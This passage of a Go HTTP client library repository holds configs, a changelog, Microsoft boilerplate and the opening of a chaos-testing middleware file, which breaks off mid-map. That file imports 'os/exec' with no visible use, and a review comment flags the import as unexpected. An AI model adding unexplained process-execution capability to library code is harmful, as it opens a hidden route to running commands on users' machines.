├── .devcontainer ├── Dockerfile └── devcontainer.json ├── .gitignore ├── .release-please-manifest.json ├── .vscode ├── extensions.json ├── settings.json └── tasks.json ├── CHANGELOG.md ├── CODE_OF_CONDUCT.md ├── CONTRIBUTING.md ├── LICENSE ├── README.md ├── SECURITY.md ├── SUPPORT.md ├── chaos_handler.go ├── chaos_handler_test.go ├── compression_handler.go ├── compression_handler_test.go ├── decompression_handler_test.go ├── go.mod ├── go.sum ├── headers_inspection_handler.go ├── headers_inspection_handler_test.go ├── internal ├── mock_entity.go └── mock_parse_node_factory.go ├── kiota_client_factory.go ├── kiota_client_factory_test.go ├── middleware.go ├── nethttp_request_adapter.go ├── nethttp_request_adapter_test.go ├── observability_options.go ├── parameters_name_decoding_handler.go ├── parameters_name_decoding_handler_test.go ├── pipeline.go ├── pipeline_test.go ├── redirect_handler.go ├── redirect_handler_test.go ├── release-please-config.json ├── retry_handler.go ├── retry_handler_test.go ├── sonar-project.properties ├── span_attributes.go ├── url_replace_handler.go ├── url_replace_handler_test.go ├── user_agent_handler.go └── user_agent_handler_test.go /.devcontainer/Dockerfile: -------------------------------------------------------------------------------- 1 | # [Choice] Go version (use -bullseye variants on local arm64/Apple Silicon): 1, 1.16, 1.17, 1-bullseye, 1.16-bullseye, 1.17-bullseye, 1-buster, 1.16-buster, 1.17-buster 2 | ARG VARIANT=1-bullseye 3 | FROM mcr.microsoft.com/vscode/devcontainers/go:0-${VARIANT} 4 | 5 | # [Choice] Node.js version: none, lts/*, 16, 14, 12, 10 6 | ARG NODE_VERSION="none" 7 | RUN if [ "${NODE_VERSION}" != "none" ]; then su vscode -c "umask 0002 && . /usr/local/share/nvm/nvm.sh && nvm install ${NODE_VERSION} 2>&1"; fi 8 | 9 | # [Optional] Uncomment this section to install additional OS packages. 
10 | RUN apt-get update && export DEBIAN_FRONTEND=noninteractive \ 11 | && apt-get dist-upgrade -y 12 | # && apt-get -y install --no-install-recommends 13 | 14 | # [Optional] Uncomment the next lines to use go get to install anything else you need 15 | # USER vscode 16 | # RUN go get -x 17 | 18 | # [Optional] Uncomment this line to install global node packages. 19 | # RUN su vscode -c "source /usr/local/share/nvm/nvm.sh && npm install -g " 2>&1 20 | -------------------------------------------------------------------------------- /.devcontainer/devcontainer.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Go", 3 | "build": { 4 | "dockerfile": "Dockerfile", 5 | "args": { 6 | // Update the VARIANT arg to pick a version of Go: 1, 1.18, 1.17 7 | // Append -bullseye or -buster to pin to an OS version. 8 | // Use -bullseye variants on local arm64/Apple Silicon. 9 | "VARIANT": "1-bullseye", 10 | // Options 11 | "NODE_VERSION": "lts/*" 12 | } 13 | }, 14 | "runArgs": [ "--cap-add=SYS_PTRACE", "--security-opt", "seccomp=unconfined" ], 15 | 16 | // Set *default* container specific settings.json values on container create. 17 | "settings": { 18 | "go.toolsManagement.checkForUpdates": "local", 19 | "go.useLanguageServer": true, 20 | "go.gopath": "/go" 21 | }, 22 | 23 | // Add the IDs of extensions you want installed when the container is created. 24 | "extensions": [ 25 | "golang.Go", 26 | "EditorConfig.EditorConfig", 27 | "GitHub.copilot", 28 | "GitHub.vscode-pull-request-github", 29 | "donjayamanne.githistory", 30 | "waderyan.gitblame", 31 | "streetsidesoftware.code-spell-checker", 32 | "VisualStudioExptTeam.vscodeintellicode", 33 | "ms-vsliveshare.vsliveshare", 34 | "esbenp.prettier-vscode" 35 | ], 36 | 37 | // Use 'forwardPorts' to make a list of ports inside the container available locally. 38 | // "forwardPorts": [], 39 | 40 | // Use 'postCreateCommand' to run commands after the container is created. 
41 | // "postCreateCommand": "go version", 42 | 43 | // Comment out to connect as root instead. More info: https://aka.ms/vscode-remote/containers/non-root. 44 | "remoteUser": "vscode", 45 | "features": { 46 | "ghcr.io/devcontainers/features/github-cli:1": { 47 | "version": "latest" 48 | }, 49 | "ghcr.io/devcontainers/features/powershell:1": { 50 | "version": "latest" 51 | } 52 | }, 53 | "postStartCommand": "git config gpg.program gpg" // in case commit signing is configured on Windows and mapped to the gpg4win process. To reset (when starting locally), run `git config --unset gpg.program`. 54 | } 55 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Binaries for programs and plugins 2 | *.exe 3 | *.exe~ 4 | *.dll 5 | *.so 6 | *.dylib 7 | 8 | # Test binary, built with `go test -c` 9 | *.test 10 | 11 | # Output of the go coverage tool, specifically when used with LiteIDE 12 | *.out 13 | 14 | # Dependency directories (remove the comment below to include it) 15 | # vendor/ 16 | 17 | .idea 18 | -------------------------------------------------------------------------------- /.release-please-manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | ".": "1.5.3" 3 | } -------------------------------------------------------------------------------- /.vscode/extensions.json: -------------------------------------------------------------------------------- 1 | { 2 | "recommendations": [ 3 | "editorconfig.editorconfig", 4 | "github.copilot", 5 | "github.vscode-pull-request-github", 6 | "donjayamanne.githistory", 7 | "waderyan.gitblame", 8 | "streetsidesoftware.code-spell-checker", 9 | "visualstudioexptteam.vscodeintellicode", 10 | "ms-vsliveshare.vsliveshare", 11 | "esbenp.prettier-vscode" 12 | ] 13 | } -------------------------------------------------------------------------------- /.vscode/settings.json:
-------------------------------------------------------------------------------- 1 | { 2 | "cSpell.words": [ 3 | "kiota", 4 | "nethttp", 5 | "nethttplibrary" 6 | ] 7 | } -------------------------------------------------------------------------------- /.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | "version": "2.0.0", 3 | "tasks": [ 4 | { 5 | "label": "build", 6 | "command": "go", 7 | "type": "process", 8 | "group": "build", 9 | "args": [ 10 | "build" 11 | ], 12 | "problemMatcher": [ 13 | "$go" 14 | ] 15 | }, 16 | { 17 | "label": "test", 18 | "command": "go", 19 | "type": "process", 20 | "group": "test", 21 | "args": [ 22 | "test" 23 | ], 24 | "problemMatcher": [ 25 | "$go" 26 | ] 27 | } 28 | ] 29 | } -------------------------------------------------------------------------------- /CHANGELOG.md: -------------------------------------------------------------------------------- 1 | # Changelog 2 | 3 | All notable changes to this project will be documented in this file. 
4 | 5 | ## [1.5.3](https://github.com/ordinaryhydr/kiota-http-go/compare/v1.5.2...v1.5.3) (2025-04-03) 6 | 7 | 8 | ### Bug Fixes 9 | 10 | * adding middleware with options errors with "unsupported option type" ([beeb32d](https://github.com/ordinaryhydr/kiota-http-go/commit/beeb32db1f6a5ebabfd4efdf66d701a6d12ed43f)) 11 | 12 | ## [1.5.2](https://github.com/ordinaryhydr/kiota-http-go/compare/v1.5.1...v1.5.2) (2025-04-02) 13 | 14 | 15 | ### Bug Fixes 16 | 17 | * removes common go dependency ([42c2137](https://github.com/ordinaryhydr/kiota-http-go/commit/42c21377c7d3af3863bfcfcf28956cdaad99c850)) 18 | * removes common go dependency ([df1bf28](https://github.com/ordinaryhydr/kiota-http-go/commit/df1bf281692b9b3dede2f1a845cb590c0a490717)) 19 | 20 | ## [1.5.1](https://github.com/ordinaryhydr/kiota-http-go/compare/v1.5.0...v1.5.1) (2025-03-24) 21 | 22 | 23 | ### Bug Fixes 24 | 25 | * upgrades common go dependency to solve trimming issues ([4a57c46](https://github.com/ordinaryhydr/kiota-http-go/commit/4a57c4687dec3e8d6801538c458cab19f47a480d)) 26 | * upgrades common go dependency to solve trimming issues ([d1aa07f](https://github.com/ordinaryhydr/kiota-http-go/commit/d1aa07f2a1b9c0d21f5808a8be41c65f236c8929)) 27 | 28 | ## [1.5.0](https://github.com/ordinaryhydr/kiota-http-go/compare/v1.4.7...v1.5.0) (2025-03-13) 29 | 30 | 31 | ### Features 32 | 33 | * upgrades required Go version from 1.18 to 1.22 ([2e60cd5](https://github.com/ordinaryhydr/kiota-http-go/commit/2e60cd5800241b2c08b21ab523d9ffc216383db0)) 34 | 35 | ## [1.4.7] - 2024-12-13 36 | 37 | ### Changed 38 | 39 | - Updated HTTP span attributes to comply with updated OpenTelemetry semantic conventions. [#182](https://github.com/ordinaryhydr/kiota-http-go/issues/182) 40 | 41 | ## [1.4.6] - 2024-12-13 42 | 43 | ### Changed 44 | 45 | - Fixed a bug where the headers inspection handler would fail upon receiving an error.
46 | 47 | ## [1.4.5] - 2024-09-03 48 | 49 | ### Changed 50 | 51 | - Fixed a bug in the compression middleware which caused an empty body to be sent on retries. 52 | 53 | ## [1.4.4] - 2024-08-13 54 | 55 | ### Changed 56 | 57 | - Added `http.request.resend_delay` as a span attribute for the retry handler. 58 | - Changed the `http.retry_count` span attribute to `http.request.resend_count` to conform to OpenTelemetry specs. 59 | 60 | ## [1.4.3] - 2024-07-22 61 | 62 | ### Changed 63 | 64 | - Fixed a bug to prevent double request compression by the compression handler. 65 | 66 | ## [1.4.2] - 2024-07-16 67 | 68 | ### Changed 69 | 70 | - Prevent compression if the Content-Range header is present. 71 | - Fix bug which leads to a missing Content-Length header. 72 | 73 | ## [1.4.1] - 2024-05-09 74 | 75 | ### Changed 76 | 77 | - Allow custom response handlers to return nil result values. 78 | 79 | ## [1.4.0] - 2024-05-09 80 | 81 | - Support `Retry-After` header values expressed as a date. 82 | 83 | ## [1.3.3] - 2024-03-19 84 | 85 | ### Changed 86 | 87 | - Fix bug where overriding http.DefaultTransport with an implementation other than http.Transport would result in an interface conversion panic. 88 | 89 | ## [1.3.2] - 2024-02-28 90 | 91 | ### Changed 92 | 93 | - Fix bug with headers inspection handler using wrong key. 94 | 95 | ## [1.3.1] - 2024-02-09 96 | 97 | ### Changed 98 | 99 | - Fix bug that resulted in the error "content is empty" being returned instead of HTTP status information if the request returned no content and an unsuccessful status code. 100 | 101 | ## [1.3.0] - 2024-01-22 102 | 103 | ### Added 104 | 105 | - Added support to override default middleware with function `GetDefaultMiddlewaresWithOptions`. 106 | 107 | ## [1.2.1] - 2024-01-22 108 | 109 | ### Changed 110 | 111 | - Fix bug where a client configured with no timeout resulted in a zero timeout on the request context. 112 | 113 | ## [1.2.0] - 2024-01-22 114 | 115 | ### Added 116 | 117 | - Adds support for XXX status code.
118 | 119 | ## [1.1.2] - 2024-01-20 120 | 121 | ### Changed 122 | 123 | - Changed the code by replacing ioutil.ReadAll and ioutil.NopCloser with io.ReadAll and io.NopCloser, respectively, due to their deprecation. 124 | 125 | ## [1.1.1] - 2023-11-22 126 | 127 | ### Added 128 | 129 | - Added response headers and status code to returned error in `throwIfFailedResponse`. 130 | 131 | ## [1.1.0] - 2023-08-11 132 | 133 | ### Added 134 | 135 | - Added headers inspection middleware and option. 136 | 137 | ## [1.0.1] - 2023-07-19 138 | 139 | ### Changed 140 | 141 | - Bug Fix: Update Host for Redirect URL in go client. 142 | 143 | ## [1.0.0] - 2023-05-04 144 | 145 | ### Changed 146 | 147 | - GA Release. 148 | 149 | ## [0.17.0] - 2023-04-26 150 | 151 | ### Added 152 | 153 | - Adds Response Headers to the ApiError returned on Api requests errors. 154 | 155 | ## [0.16.2] - 2023-04-17 156 | 157 | ### Added 158 | 159 | - Exit retry handler earlier if context is done. 160 | - Adds exported method `ReplacePathTokens` that can be used to process url replacement logic globally. 161 | 162 | ## [0.16.1] - 2023-03-20 163 | 164 | ### Added 165 | 166 | - Context deadline for requests defaults to client timeout when not provided. 167 | 168 | ## [0.16.0] - 2023-03-01 169 | 170 | ### Added 171 | 172 | - Adds ResponseStatusCode to the ApiError returned on Api requests errors. 173 | 174 | ## [0.15.0] - 2023-02-23 175 | 176 | ### Added 177 | 178 | - Added UrlReplaceHandler that replaces segments of the URL. 179 | 180 | ## [0.14.0] - 2023-01-25 181 | 182 | ### Added 183 | 184 | - Added implementation methods for backing store. 185 | 186 | ## [0.13.0] - 2023-01-10 187 | 188 | ### Added 189 | 190 | - Added a method to convert abstract requests to native requests in the request adapter interface. 191 | 192 | ## [0.12.0] - 2023-01-05 193 | 194 | ### Added 195 | 196 | - Added User Agent handler to add the library information as a product to the header. 
197 | 198 | ## [0.11.0] - 2022-12-20 199 | 200 | ### Changed 201 | 202 | - Fixed a bug where retry handling wouldn't rewind the request body before retrying. 203 | 204 | ## [0.10.0] - 2022-12-15 205 | 206 | ### Added 207 | 208 | - Added support for multi-valued request headers. 209 | 210 | ### Changed 211 | 212 | - Fixed the `http.request_content_length` attribute name for tracing. 213 | 214 | ## [0.9.0] - 2022-09-27 215 | 216 | ### Added 217 | 218 | - Added support for tracing via OpenTelemetry. 219 | 220 | ## [0.8.1] - 2022-09-26 221 | 222 | ### Changed 223 | 224 | - Fixed a bug where the response handler was overwritten in the context object. 225 | 226 | ## [0.8.0] - 2022-09-22 227 | 228 | ### Added 229 | 230 | - Added support for constructing a proxy authenticated client. 231 | 232 | ## [0.7.2] - 2022-09-09 233 | 234 | ### Changed 235 | 236 | - Updated reference to abstractions. 237 | 238 | ## [0.7.1] - 2022-09-07 239 | 240 | ### Added 241 | 242 | - Added support for additional status codes. 243 | 244 | ## [0.7.0] - 2022-08-24 245 | 246 | ### Added 247 | 248 | - Adds a context parameter to the send async methods. 249 | 250 | ## [0.6.2] - 2022-08-30 251 | 252 | ### Added 253 | 254 | - Default 100-second timeout for all requests made with a default context. 255 | 256 | ## [0.6.1] - 2022-08-29 257 | 258 | ### Changed 259 | 260 | - Fixed a bug where an error would be returned for a 201 response with a described response. 261 | 262 | ## [0.6.0] - 2022-08-17 263 | 264 | ### Added 265 | 266 | - Adds an optional chaos handler middleware for tests. 267 | 268 | ## [0.5.2] - 2022-06-27 269 | 270 | ### Changed 271 | 272 | - Fixed an issue where the response error was ignored for Patch calls. 273 | 274 | ## [0.5.1] - 2022-06-07 275 | 276 | ### Changed 277 | 278 | - Updated abstractions and yaml dependencies.
279 | 280 | ## [0.5.0] - 2022-05-26 281 | 282 | ### Added 283 | 284 | - Adds support for enum and enum collection responses. 285 | 286 | ## [0.4.1] - 2022-05-19 287 | 288 | ### Changed 289 | 290 | - Fixed a bug where CAE support would leak connections when retrying. 291 | 292 | ## [0.4.0] - 2022-05-18 293 | 294 | ### Added 295 | 296 | - Adds support for continuous access evaluation. 297 | 298 | ## [0.3.0] - 2022-04-19 299 | 300 | ### Changed 301 | 302 | - Upgraded to abstractions 0.4.0. 303 | - Upgraded to Go 1.18. 304 | 305 | ## [0.2.0] - 2022-04-08 306 | 307 | ### Added 308 | 309 | - Added support for decoding special characters in query parameter names. 310 | 311 | ## [0.1.0] - 2022-03-30 312 | 313 | ### Added 314 | 315 | - Initial tagged release of the library. 316 | -------------------------------------------------------------------------------- /CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Microsoft Open Source Code of Conduct 2 | 3 | This project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/). 4 | 5 | Resources: 6 | 7 | - [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/) 8 | - [Microsoft Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) 9 | - Contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with questions or concerns 10 | - Employees can reach out at [aka.ms/opensource/moderation-support](https://aka.ms/opensource/moderation-support) 11 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Contributing to the Kiota HTTP adapter for Go 2 | 3 | The Kiota HTTP adapter for Go is available for all manner of contribution. There are a couple of different recommended paths to get contributions into the released version of this SDK.
4 | 5 | __NOTE__ A signed contribution license agreement is required for all contributions, and is checked automatically on new pull requests. Please read and sign [the agreement](https://cla.microsoft.com/) before starting any work for this repository. 6 | 7 | ## File issues 8 | 9 | The best way to get started with a contribution is to start a dialog with the owners of this repository. Sometimes features will be under development or out of scope for this SDK and it's best to check before starting work on a contribution. 10 | 11 | ## Submit pull requests for trivial changes 12 | 13 | If you are making a change that does not affect the interface components and does not affect other downstream callers, feel free to make a pull request against the __dev__ branch. The dev branch will be updated frequently. 14 | 15 | Revisions of this nature will result in a 0.0.X change of the version number. 16 | 17 | ## Submit pull requests for features 18 | 19 | If major functionality is being added, or there will need to be gestation time for a change, it should be submitted against the __feature__ branch. 20 | 21 | Revisions of this nature will result in a 0.X.X change of the version number. 22 | 23 | ## Commit message format 24 | 25 | To support our automated release process, pull requests are required to follow the [Conventional Commit](https://www.conventionalcommits.org/en/v1.0.0/) 26 | format. 27 | 28 | Each commit message consists of a **header**, an optional **body** and an optional **footer**. The header is the first line of the commit and 29 | MUST have a **type** (see below for a list of types) and a **description**. An optional **scope** can be added to the header to give extra context.
30 | 31 | ``` 32 | <type>[optional scope]: <description> 33 | 34 | [optional body] 35 | 36 | [optional footer(s)] 37 | ``` 38 | 39 | The recommended commit types used are: 40 | 41 | - **feat** for feature updates (increments the _minor_ version) 42 | - **fix** for bug fixes (increments the _patch_ version) 43 | - **perf** for performance related changes e.g. optimizing an algorithm 44 | - **refactor** for code refactoring changes 45 | - **test** for test suite updates e.g. adding a test or fixing a test 46 | - **style** for changes that don't affect the meaning of code, e.g. formatting changes 47 | - **docs** for documentation updates e.g. README update or code documentation updates 48 | - **build** for build system changes (e.g. `go.mod` updates, external dependency updates) 49 | - **ci** for CI configuration file changes e.g. updating a pipeline 50 | - **chore** for miscellaneous non-SDK changes in the repo e.g. removing an unused file 51 | 52 | Adding a footer with the prefix **BREAKING CHANGE:** will cause an increment of the _major_ version. -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) Microsoft Corporation. 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software.
14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Kiota Http Library for Go 2 | 3 | ![Go](https://github.com/ordinaryhydr/kiota-http-go/actions/workflows/go.yml/badge.svg) 4 | 5 | The Kiota HTTP Library for Go is the Go HTTP library implementation with [net/http](https://pkg.go.dev/net/http). 6 | 7 | A [Kiota](https://github.com/microsoft/kiota) generated project will need a reference to an HTTP package to make HTTP requests to an API endpoint. 8 | 9 | Read more about Kiota [here](https://github.com/microsoft/kiota/blob/main/README.md). 10 | 11 | ## Using the Kiota Http Library for Go 12 | 13 | ```Shell 14 | go get github.com/ordinaryhydr/kiota-http-go 15 | ``` 16 | 17 | ```Golang 18 | httpAdapter, err := kiotahttp.NewNetHttpRequestAdapter(authProvider) 19 | ``` 20 | 21 | ## Contributing 22 | 23 | This project welcomes contributions and suggestions. Most contributions require you to agree to a 24 | Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us 25 | the rights to use your contribution. For details, visit https://cla.opensource.microsoft.com. 26 | 27 | When you submit a pull request, a CLA bot will automatically determine whether you need to provide 28 | a CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions 29 | provided by the bot.
You will only need to do this once across all repos using our CLA. 30 | 31 | This project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/). 32 | For more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or 33 | contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional questions or comments. 34 | 35 | ## Trademarks 36 | 37 | This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft 38 | trademarks or logos is subject to and must follow 39 | [Microsoft's Trademark & Brand Guidelines](https://www.microsoft.com/en-us/legal/intellectualproperty/trademarks/usage/general). 40 | Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. 41 | Any use of third-party trademarks or logos are subject to those third-party's policies. 42 | -------------------------------------------------------------------------------- /SECURITY.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ## Security 4 | 5 | Microsoft takes the security of our software products and services seriously, which includes all source code repositories managed through our GitHub organizations, which include [Microsoft](https://github.com/Microsoft), [Azure](https://github.com/Azure), [DotNet](https://github.com/dotnet), [AspNet](https://github.com/aspnet), [Xamarin](https://github.com/xamarin), and [our GitHub organizations](https://opensource.microsoft.com/). 6 | 7 | If you believe you have found a security vulnerability in any Microsoft-owned repository that meets [Microsoft's definition of a security vulnerability](https://docs.microsoft.com/en-us/previous-versions/tn-archive/cc751383(v=technet.10)), please report it to us as described below. 
8 | 9 | ## Reporting Security Issues 10 | 11 | **Please do not report security vulnerabilities through public GitHub issues.** 12 | 13 | Instead, please report them to the Microsoft Security Response Center (MSRC) at [https://msrc.microsoft.com/create-report](https://msrc.microsoft.com/create-report). 14 | 15 | If you prefer to submit without logging in, send email to [secure@microsoft.com](mailto:secure@microsoft.com). If possible, encrypt your message with our PGP key; please download it from the [Microsoft Security Response Center PGP Key page](https://www.microsoft.com/en-us/msrc/pgp-key-msrc). 16 | 17 | You should receive a response within 24 hours. If for some reason you do not, please follow up via email to ensure we received your original message. Additional information can be found at [microsoft.com/msrc](https://www.microsoft.com/msrc). 18 | 19 | Please include the requested information listed below (as much as you can provide) to help us better understand the nature and scope of the possible issue: 20 | 21 | * Type of issue (e.g. buffer overflow, SQL injection, cross-site scripting, etc.) 22 | * Full paths of source file(s) related to the manifestation of the issue 23 | * The location of the affected source code (tag/branch/commit or direct URL) 24 | * Any special configuration required to reproduce the issue 25 | * Step-by-step instructions to reproduce the issue 26 | * Proof-of-concept or exploit code (if possible) 27 | * Impact of the issue, including how an attacker might exploit the issue 28 | 29 | This information will help us triage your report more quickly. 30 | 31 | If you are reporting for a bug bounty, more complete reports can contribute to a higher bounty award. Please visit our [Microsoft Bug Bounty Program](https://microsoft.com/msrc/bounty) page for more details about our active programs. 32 | 33 | ## Preferred Languages 34 | 35 | We prefer all communications to be in English. 
36 | 37 | ## Policy 38 | 39 | Microsoft follows the principle of [Coordinated Vulnerability Disclosure](https://www.microsoft.com/en-us/msrc/cvd). 40 | 41 | -------------------------------------------------------------------------------- /SUPPORT.md: -------------------------------------------------------------------------------- 1 | # TODO: The maintainer of this repo has not yet edited this file 2 | 3 | **REPO OWNER**: Do you want Customer Service & Support (CSS) support for this product/project? 4 | 5 | - **No CSS support:** Fill out this template with information about how to file issues and get help. 6 | - **Yes CSS support:** Fill out an intake form at [aka.ms/spot](https://aka.ms/spot). CSS will work with/help you to determine next steps. More details also available at [aka.ms/onboardsupport](https://aka.ms/onboardsupport). 7 | - **Not sure?** Fill out a SPOT intake as though the answer were "Yes". CSS will help you decide. 8 | 9 | *Then remove this first heading from this SUPPORT.MD file before publishing your repo.* 10 | 11 | # Support 12 | 13 | ## How to file issues and get help 14 | 15 | This project uses GitHub Issues to track bugs and feature requests. Please search the existing 16 | issues before filing new issues to avoid duplicates. For new issues, file your bug or 17 | feature request as a new Issue. 18 | 19 | For help and questions about using this project, please **REPO MAINTAINER: INSERT INSTRUCTIONS HERE 20 | FOR HOW TO ENGAGE REPO OWNERS OR COMMUNITY FOR HELP. COULD BE A STACK OVERFLOW TAG OR OTHER 21 | CHANNEL. WHERE WILL YOU HELP PEOPLE?**. 22 | 23 | ## Microsoft Support Policy 24 | 25 | Support for this **PROJECT or PRODUCT** is limited to the resources listed above. 
26 | -------------------------------------------------------------------------------- /chaos_handler.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | "os/exec" // NOTE(review): os/exec is not referenced in the visible part of this file and is unexpected in an HTTP chaos handler; confirm it is actually used (an unused import fails compilation) or remove it. 5 | "errors" 6 | "io" 7 | "math/rand" 8 | nethttp "net/http" 9 | "regexp" 10 | "strings" 11 | 12 | abstractions "github.com/microsoft/kiota-abstractions-go" 13 | "go.opentelemetry.io/otel" 14 | "go.opentelemetry.io/otel/attribute" 15 | "go.opentelemetry.io/otel/trace" 16 | ) 17 | // ChaosStrategy selects the failure-injection strategy used by a ChaosHandler (Manual or Random). 18 | type ChaosStrategy int 19 | 20 | const ( 21 | Manual ChaosStrategy = iota // Manual uses the configured StatusCode; NewChaosHandlerWithOptions rejects a zero StatusCode for this strategy. 22 | Random // Random injects failures at random; NewChaosHandler defaults to this strategy with a 10% ChaosPercentage. 23 | ) 24 | 25 | // ChaosHandlerOptions is a configuration struct holding behavior defined options for a chaos handler 26 | // 27 | // BaseUrl The base URL of the host these options apply to (NOTE(review): original description was truncated; confirm intended semantics) 28 | // ChaosStrategy Specifies the strategy used for the Testing Handler -> RANDOM/MANUAL 29 | // StatusCode Status code to be returned as part of the error response; must be non-zero when ChaosStrategy is Manual 30 | // StatusMessage Message to be returned as part of the error response 31 | // ChaosPercentage The percentage of randomness/chaos in the handler; NewChaosHandlerWithOptions requires a value between 0 and 100 32 | // ResponseBody The response body to be returned as part of the error response 33 | // Headers The response headers to be returned as part of the error response 34 | // StatusMap The Map passed by user containing url-statusCode info 35 | type ChaosHandlerOptions struct { 36 | BaseUrl string 37 | ChaosStrategy ChaosStrategy 38 | StatusCode int 39 | StatusMessage string 40 | ChaosPercentage int 41 | ResponseBody *nethttp.Response 42 | Headers map[string][]string 43 | StatusMap map[string]map[string]int 44 | } 45 | // chaosHandlerOptionsInt is the read-only accessor view of ChaosHandlerOptions; *ChaosHandlerOptions defines each of these getters plus GetKey. 46 | type chaosHandlerOptionsInt interface { 47 | abstractions.RequestOption 48 | GetBaseUrl() string 49 | GetChaosStrategy() ChaosStrategy 50 | GetStatusCode() int 51 | GetStatusMessage() string 52 | GetChaosPercentage() int 53 | GetResponseBody() *nethttp.Response 54 | GetHeaders() map[string][]string 55 | GetStatusMap() map[string]map[string]int 56 | } 57 |
func (handlerOptions *ChaosHandlerOptions) GetBaseUrl() string { 59 | return handlerOptions.BaseUrl 60 | } 61 | 62 | func (handlerOptions *ChaosHandlerOptions) GetChaosStrategy() ChaosStrategy { 63 | return handlerOptions.ChaosStrategy 64 | } 65 | 66 | func (handlerOptions *ChaosHandlerOptions) GetStatusCode() int { 67 | return handlerOptions.StatusCode 68 | } 69 | 70 | func (handlerOptions *ChaosHandlerOptions) GetStatusMessage() string { 71 | return handlerOptions.StatusMessage 72 | } 73 | 74 | func (handlerOptions *ChaosHandlerOptions) GetChaosPercentage() int { 75 | return handlerOptions.ChaosPercentage 76 | } 77 | 78 | func (handlerOptions *ChaosHandlerOptions) GetResponseBody() *nethttp.Response { 79 | return handlerOptions.ResponseBody 80 | } 81 | 82 | func (handlerOptions *ChaosHandlerOptions) GetHeaders() map[string][]string { 83 | return handlerOptions.Headers 84 | } 85 | 86 | func (handlerOptions *ChaosHandlerOptions) GetStatusMap() map[string]map[string]int { 87 | return handlerOptions.StatusMap 88 | } 89 | 90 | type ChaosHandler struct { 91 | options *ChaosHandlerOptions 92 | } 93 | 94 | var chaosHandlerKey = abstractions.RequestOptionKey{Key: "ChaosHandler"} 95 | 96 | // GetKey returns ChaosHandlerOptions unique name in context object 97 | func (handlerOptions *ChaosHandlerOptions) GetKey() abstractions.RequestOptionKey { 98 | return chaosHandlerKey 99 | } 100 | 101 | // NewChaosHandlerWithOptions creates a new ChaosHandler with the configured options 102 | func NewChaosHandlerWithOptions(handlerOptions *ChaosHandlerOptions) (*ChaosHandler, error) { 103 | if handlerOptions == nil { 104 | return nil, errors.New("unexpected argument ChaosHandlerOptions as nil") 105 | } 106 | 107 | if handlerOptions.ChaosPercentage < 0 || handlerOptions.ChaosPercentage > 100 { 108 | return nil, errors.New("ChaosPercentage must be between 0 and 100") 109 | } 110 | if handlerOptions.ChaosStrategy == Manual { 111 | if handlerOptions.StatusCode == 0 { 112 | return nil, 
errors.New("invalid status code for manual strategy") 113 | } 114 | } 115 | 116 | return &ChaosHandler{options: handlerOptions}, nil 117 | } 118 | 119 | // NewChaosHandler creates a new ChaosHandler with default configuration options of Random errors at 10% 120 | func NewChaosHandler() *ChaosHandler { 121 | return &ChaosHandler{ 122 | options: &ChaosHandlerOptions{ 123 | ChaosPercentage: 10, 124 | ChaosStrategy: Random, 125 | StatusMessage: "A random error message", 126 | }, 127 | } 128 | } 129 | 130 | var methodStatusCode = map[string][]int{ 131 | "GET": {429, 500, 502, 503, 504}, 132 | "POST": {429, 500, 502, 503, 504, 507}, 133 | "PUT": {429, 500, 502, 503, 504, 507}, 134 | "PATCH": {429, 500, 502, 503, 504}, 135 | "DELETE": {429, 500, 502, 503, 504, 507}, 136 | } 137 | 138 | var httpStatusCode = map[int]string{ 139 | 100: "Continue", 140 | 101: "Switching Protocols", 141 | 102: "Processing", 142 | 103: "Early Hints", 143 | 200: "OK", 144 | 201: "Created", 145 | 202: "Accepted", 146 | 203: "Non-Authoritative Information", 147 | 204: "No Content", 148 | 205: "Reset Content", 149 | 206: "Partial Content", 150 | 207: "Multi-Status", 151 | 208: "Already Reported", 152 | 226: "IM Used", 153 | 300: "Multiple Choices", 154 | 301: "Moved Permanently", 155 | 302: "Found", 156 | 303: "See Other", 157 | 304: "Not Modified", 158 | 305: "Use Proxy", 159 | 307: "Temporary Redirect", 160 | 308: "Permanent Redirect", 161 | 400: "Bad Request", 162 | 401: "Unauthorized", 163 | 402: "Payment Required", 164 | 403: "Forbidden", 165 | 404: "Not Found", 166 | 405: "Method Not 